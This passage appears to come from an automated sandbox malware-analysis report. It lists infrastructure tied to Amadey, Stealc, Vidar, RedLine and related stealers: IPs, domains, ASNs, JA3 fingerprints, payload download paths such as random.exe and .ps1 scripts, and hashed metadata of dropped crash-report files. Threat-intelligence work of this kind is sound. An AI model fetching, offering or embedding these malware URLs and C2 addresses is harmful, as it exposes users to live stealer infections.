                                      185.215.113.43file.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.43/Zu7JuNko/index.php
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.43/Zu7JuNko/index.php
                                      194.116.215.195jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                      • 194.116.215.195/12dsvc.exe
                                      185.215.113.100file.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.100/test/blo.ps1
                                      jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                      • 185.215.113.100/steam/random.exe
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.100/test/do.ps1
                                      SecuriteInfo.com.Win32.Evo-gen.12679.2695.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.100/steam/random.exe
                                      SecuriteInfo.com.Win32.Evo-gen.12679.2695.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                      • 185.215.113.100/steam/random.exe
                                      SecuriteInfo.com.Win32.Evo-gen.6752.26418.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                      • 185.215.113.100/steam/random.exe
                                      SecuriteInfo.com.Win32.Evo-gen.26545.23661.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.100/steam/random.exe
                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                      • 185.215.113.100/steam/random.exe
                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                      • 185.215.113.100/well/random.exe
                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                      • 185.215.113.100/well/random.exe

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      www.leopardi.nlfile.exeGet hashmaliciousAmadeyBrowse
                                      • 46.19.218.204

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      VMAGE-ASRUjD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                      • 194.116.215.195
                                      jsJ6NIt35F.exeGet hashmaliciousGo Injector, Stealc, VidarBrowse
                                      • 194.116.216.149
                                      1.exeGet hashmaliciousGo Injector, RHADAMANTHYSBrowse
                                      • 193.23.55.27
                                      1.bin.exeGet hashmaliciousGo Injector, RHADAMANTHYSBrowse
                                      • 193.23.55.27
                                      Catalog co.pdf.lnkGet hashmaliciousMalLnkBrowse
                                      • 45.89.53.91
                                      QTmGYKK6SL.exeGet hashmaliciousUnknownBrowse
                                      • 45.89.55.34
                                      laNODWeL05.elfGet hashmaliciousUnknownBrowse
                                      • 45.8.146.126
                                      88GL8hAsax.elfGet hashmaliciousUnknownBrowse
                                      • 45.8.146.126
                                      108.181.0.237-mipsel-2024-07-19T02_12_47.elfGet hashmaliciousUnknownBrowse
                                      • 45.8.146.126
                                      108.181.0.237-mips-2024-07-19T02_12_46.elfGet hashmaliciousUnknownBrowse
                                      • 45.8.146.126
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      0b2d3534f5efedc02dd5ee255b6dbc45file.exeGet hashmaliciousAmadeyBrowse
                                      • 46.19.218.204
                                      69b051851503b52d16a3a25f8bbe0423__44__0.exeGet hashmaliciousUnknownBrowse
                                      • 46.19.218.204
                                      37f463bf4616ecd445d4a1937da06e19ppRPznH6ep.exeGet hashmaliciousUnknownBrowse
                                      • 46.19.218.204
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 46.19.218.204
                                      List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 46.19.218.204
                                      ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                      • 46.19.218.204
                                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                      • 46.19.218.204
                                      DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                      • 46.19.218.204
                                      SIGN_23930581750#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 46.19.218.204
                                      Windows.exeGet hashmaliciousUnknownBrowse
                                      • 46.19.218.204
                                      Windows.exeGet hashmaliciousUnknownBrowse
                                      • 46.19.218.204
                                      BA4M310209H14956.docx.docGet hashmaliciousUnknownBrowse
                                      • 46.19.218.204

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exejD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                        SecuriteInfo.com.Win32.TrojanX-gen.1325.25139.exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                          SecuriteInfo.com.Trojan.Siggen29.39642.1614.1457.exeGet hashmaliciousMicroClip, RedLine, XWormBrowse
                                            file.exeGet hashmaliciousAmadey, Cryptbot, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                              VMRhiAFJtl.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer, RedLine, StealcBrowse
                                                XpCyBwDzEt.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLineBrowse
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exejD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                    SecuriteInfo.com.Win32.TrojanX-gen.1325.25139.exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_b74664dd7e.exe_cf7a3cd6c9b1a122416f4df9f48741532183e75_30c7fb27_dd540fbb-80bb-426d-bdec-35c8bb8a7d98\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9821846365847873
                                                      Encrypted:false
                                                      SSDEEP:192:VsnIZeQLuuIZ6S0BU/nLkjuCZr+d1zuiFAZ24IO8Dcwz:qIpyu3ZBU/wjWHzuiFAY4IO8n
                                                      MD5:31C2E7C72CE90725B234DB36A55814EF
                                                      SHA1:8ABE780592B445A3A3480DFE58FE2D7AA45C9869
                                                      SHA-256:59B089A82A1427E7B88D64E4BCE9359F5F9E4A656BB6C41A8E62947D24C9044F
                                                      SHA-512:579143D3C23399A9B0A1ACEEE1F39D0068A982B737ACA4B704DB6E110EEC4491BFA7D38A7AF5F5260B465C788FD7DA958D8F7323EED7F47C6860E6C56D1545BC
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.6.6.5.6.8.9.4.1.2.4.9.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.6.6.5.6.8.9.9.5.9.3.7.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.5.4.0.f.b.b.-.8.0.b.b.-.4.2.6.d.-.b.d.e.c.-.3.5.c.8.b.b.8.a.7.d.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.f.5.1.d.a.1.-.f.5.7.3.-.4.0.7.8.-.a.0.1.e.-.a.0.7.d.c.7.6.7.8.9.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.7.4.6.6.4.d.d.7.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.8.4.-.0.0.0.1.-.0.0.1.4.-.d.2.a.6.-.f.9.1.1.9.7.0.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.6.2.0.b.7.a.e.7.2.3.c.1.1.c.e.a.d.f.a.4.c.9.6.b.b.b.b.3.d.f.0.0.0.0.f.f.f.f.!.0.0.0.0.3.e.a.0.5.f.0.0.0.a.d.4.6.0.7.0.d.4.1.e.4.4.9.b.3.f.1.b.7.4.1.9.1.4.4.d.9.8.f.f.!.b.7.4.6.6.4.d.d.7.e...e.x.e.....T.a.r.g.e.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3ec4738210.exe_dba66ca2d98846d9bd340a97d0db27b1eea2da_0679789e_d94d0ac4-b190-456c-bcd1-a2bb75eab446\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.965914165022417
                                                      Encrypted:false
                                                      SSDEEP:192:8sUQD91S0BU/RpIjuCZr+dQzuiFbZ24IO8nE:1BD91ZBU/QjWyzuiFbY4IO8E
                                                      MD5:57FC5AA138A72069E02D6094CDBCE60B
                                                      SHA1:7F86B820DB42FD5A4B8251A2A531B3B0EF1A0854
                                                      SHA-256:906FE343A89FC6CA332BEC3CBC135DED5F6C22AA1FE1341397FCFB3C3A73B44D
                                                      SHA-512:486242CCED4B9083DC4629765DEA8AF06E71F654DCDCD5D2CDF80CA724226C241DA67A8B5B1806886386D8C7B34139123F987F7F55E03C54421AF440FC006C5F
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.6.6.5.6.1.5.0.5.5.7.8.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.6.6.5.6.1.5.7.9.0.1.7.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.4.d.0.a.c.4.-.b.1.9.0.-.4.5.6.c.-.b.c.d.1.-.a.2.b.b.7.5.e.a.b.4.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.8.a.6.6.f.a.-.a.e.d.3.-.4.6.3.e.-.a.f.e.b.-.1.5.d.b.e.5.4.8.d.4.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.e.c.4.7.3.8.2.1.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.f.8.-.0.0.0.1.-.0.0.1.4.-.b.7.0.a.-.f.c.0.f.9.7.0.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.6.3.5.3.f.5.5.a.c.f.6.f.0.7.a.e.c.e.2.0.0.7.4.d.4.f.a.d.1.d.f.0.0.0.0.f.f.f.f.!.0.0.0.0.3.e.a.0.5.f.0.0.0.a.d.4.6.0.7.0.d.4.1.e.4.4.9.b.3.f.1.b.7.4.1.9.1.4.4.d.9.8.f.f.!.3.e.c.4.7.3.8.2.1.0...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3ec4738210.exe_dba66ca2d98846d9bd340a97d0db27b1eea2da_0679789e_ebebe12a-f956-424e-ae8e-9651352ccfe5\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9590459587825865
                                                      Encrypted:false
                                                      SSDEEP:192:rk6QDE1S0BU/RpIjzsZrRtJzuiFAZ24IO8nEg:kDE1ZBU/QjOLzuiFAY4IO8Eg
                                                      MD5:2E305F612A05F400FDDCC1655C41B708
                                                      SHA1:915745C9052AD2961DEDBF7D7726D70D038B92B7
                                                      SHA-256:88E29C2E0823D1B049AB9FFD95BB7C4D0DF4AF8C9038E37EFD0E9865395C2E82
                                                      SHA-512:AA8069324C0CCF549189674A533AA24EAE929CE2AB9B702B20ABE617BBE1AEE983C043F690471EA05DEF898AB5D6612A92455CAC89B74D00079555819571ABBB
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.6.6.5.6.5.5.8.2.5.8.5.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.6.6.5.6.5.7.6.3.8.3.5.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.e.b.e.1.2.a.-.f.9.5.6.-.4.2.4.e.-.a.e.8.e.-.9.6.5.1.3.5.2.c.c.f.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.1.a.8.b.5.d.-.1.2.8.b.-.4.e.c.6.-.9.f.7.b.-.d.1.9.8.7.5.f.1.1.e.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.e.c.4.7.3.8.2.1.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.a.c.-.0.0.0.1.-.0.0.1.4.-.9.2.c.d.-.f.e.2.2.9.7.0.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.6.3.5.3.f.5.5.a.c.f.6.f.0.7.a.e.c.e.2.0.0.7.4.d.4.f.a.d.1.d.f.0.0.0.0.f.f.f.f.!.0.0.0.0.3.e.a.0.5.f.0.0.0.a.d.4.6.0.7.0.d.4.1.e.4.4.9.b.3.f.1.b.7.4.1.9.1.4.4.d.9.8.f.f.!.3.e.c.4.7.3.8.2.1.0...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E9C.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Sep 24 15:34:15 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):285148
                                                      Entropy (8bit):1.2986766587225476
                                                      Encrypted:false
                                                      SSDEEP:768:7GVt51iEBphIe4flt1nOiaqHYy7wkfostzVxJlyepBoAgRvl:KBD67flt4idYy7LAstzVzYepBorRv
                                                      MD5:6A4ED143F7792396E154E185928A1C67
                                                      SHA1:63C88A1FE0F32ACF4827DB0AA86A1E1A8B500088
                                                      SHA-256:5BFC6F0CA1FC612A5F8B9AB106FDEF4AF557E51D7D23CA86249A0D5F61664A94
                                                      SHA-512:B98DD05597F5B43662DA6104F691C0157A12BAABF57DC6E64FFE92823072E52E53A4767435DF08BBF4E056F8A08544F766E6E0AC77F7B44E925FC9369187EA3C
                                                      Malicious:false
                                                      Preview:MDMP..a..... ..........f....................................d...............T.......8...........T............:..............L"..........8$..............................................................................eJ.......$......GenuineIntel............T..............f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FA6.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8364
                                                      Entropy (8bit):3.696454542239425
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJlS6/F6YNaSUfSgmf4BprG89b1Wsfvnm:R6lXJg6d6YQSUKgmf4T11fu
                                                      MD5:6636516B8A66EA2B405792AE04077F77
                                                      SHA1:E889B11D72972CBAB4B9BF10E37E2C8984255FEB
                                                      SHA-256:25ED9EC8102A2CE221EF71F6987679CB1132F6C48DF45F5C9655C26020910462
                                                      SHA-512:337221A718B428EE75B91F891CD2EF697F7B1CB102F70EBA275803C9E8ADB989ACA3A854D58F0825D5BD149F57FE3A1AB657A5910024EA993A5F90BFB9EDB9DF
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.6.4.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FD6.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4588
                                                      Entropy (8bit):4.446537279401681
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zs5Jg77aI9jYWpW8VYjKYm8M4JReF0+q8RrZeAd:uIjfLI7pR7VyJtCZeAd
                                                      MD5:96D8B48885CE45A1E1A5EB54CF0A65B1
                                                      SHA1:A837CDDE4FDB54E543F83E9B81EB1D55038F186C
                                                      SHA-256:C3838D52224931E091AF6CA0BBC720DF866412CAF9469F1BFFAB437045A7D89C
                                                      SHA-512:B477317CDFCF10DF45D721ED287E9C126B08A12E01943563A930C43308BD2531A2ED123E84E11673F6B492642FFB72D1FA2D91A0E7F4819C67170769E8BA1349
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="514476" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF3F.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Sep 24 15:33:35 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):290648
                                                      Entropy (8bit):1.277552031898068
                                                      Encrypted:false
                                                      SSDEEP:768:DNEHF9eExLCPZU7hHyMnEs5yC3LnKuNP5qJw9jgjhbk1wu:BqvLCPZU7hHyM+C3LnKu5wJw98jhk1z
                                                      MD5:52CC667A9AE82B5E7CB11A82353D9373
                                                      SHA1:C92D3EC0226BB3BEE84BC25501BA21432DD64206
                                                      SHA-256:43907C6BAC4189196FCA49EF91296A54D3DC95497A385BC6900E250FE12FAC25
                                                      SHA-512:DCB260D942EF846E5D5D8A9FD482C12CC198BCDFDC55414001DDEF1B5F9595F87FB00860E2AB01D11F5752845BA025B14D78A3FAF2387EE5967415BC1C89D7D2
                                                      Malicious:false
                                                      Preview:MDMP..a..... ..........f....................................................T.......8...........T...........p;...3..........."...........$..............................................................................eJ......<%......GenuineIntel............T..............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0C7.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8338
                                                      Entropy (8bit):3.6956706286657646
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJTF6w6YTR6H7I3Vgmf4BprG89bb4sf7Jm:R6lXJx6w6YF6bI3Vgmf4Dbrf4
                                                      MD5:A519F7736F9CC2099CFCD89563B9D13D
                                                      SHA1:D253E8632988C2241C3E850408429DA99BAAF518
                                                      SHA-256:CC8236CBD94DE21A9D5F4086F18E703610BBB6DF494D8B09807B90C488334110
                                                      SHA-512:095D4AE2232951FD302A32458657A434AAE407CB5AB6E22D2ACB9804C484F9946BD676EE61BD25F82EC172ED819A9EA3E5C8CC275D2A56C99BFA9144BB6809E4
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.7.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0F6.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4588
                                                      Entropy (8bit):4.446546532295904
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zs5Jg77aI9jYWpW8VYjHYm8M4JReFcp+q8R0iZeMd:uIjfLI7pR7VvJ3hiZeMd
                                                      MD5:30ECB5DD8DB0C7A5EE1C5735B1AEBBEB
                                                      SHA1:9E6BAF353C261DAE705B7D05CE5B493D1F7AB137
                                                      SHA-256:67FFAA86020039B68552BA2DCBCD3D376B62DA7C2AF445AAD9280F0A7662BC06
                                                      SHA-512:75248FAF622E09341551DAC44727EAD84EFCC83ECD2B4BB164C408374D8DA98D9BD7E9C20923B89F31465FB785FB769015DBE782AFFEC710BA8471F8CB0388BE
                                                      Malicious:false
